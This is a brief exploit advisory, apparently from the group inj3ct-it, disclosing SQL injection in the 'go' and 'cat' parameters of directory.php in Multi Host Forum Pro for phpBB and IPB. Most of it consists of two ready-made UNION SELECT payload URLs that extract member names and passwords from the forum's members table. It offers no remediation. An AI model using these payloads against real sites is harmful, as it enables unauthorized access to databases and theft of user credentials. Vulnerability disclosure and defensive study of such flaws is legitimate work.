|
---------------------------------------------------------------=0D
____ __________ __ ____ __ =0D
/_ | ____ |__\_____ \ _____/ |_ /_ |/ |_ =0D
| |/ \ | | _(__ <_/ ___\ __\ ______ | \ __\=0D
| | | \ | |/ \ \___| | /_____/ | || | =0D
|___|___| /\__| /______ /\___ >__| |___||__| =0D
\/\______| \/ \/ =0D
---------------------------------------------------------------=0D
=0D
Http://www.inj3ct-it.org Staff[at]inj3ct-it[dot]org =0D
=0D
---------------------------------------------------------------=0D
=0D
Multi Host Forum Pro phpbb & ipb Multiple Sql Injection=0D
=0D
---------------------------------------------------------------=0D
=0D
# Discovered by KiNgOfThEwOrLd=0D
=0D
---------------------------------------------------------------=0D
=0D
Corrupted Page: directory.php=0D
Corrupted Variable: ?go==0D
PoC: An attacker can get some infos from your database. The query result, may be a cookie value.=0D
=0D
Exploit: directory.php?go=-1+union+select+1,concat(name,0x3a,password),3+from+[forum]_members+where+id=[id]=0D
=0D
---------------------------------------------------------------=0D
=0D
Corrupted Page: directory.php=0D
Corrupted Variable: ?cat==0D
PoC: An attacker can get some infos from your database.=0D
=0D
Exploit: directory.php?cat=-1+union+select+1,concat(name,0x3a,password),3+from+[forum]_members+where+id=[id]=0D
=0D
---------------------------------------------------------------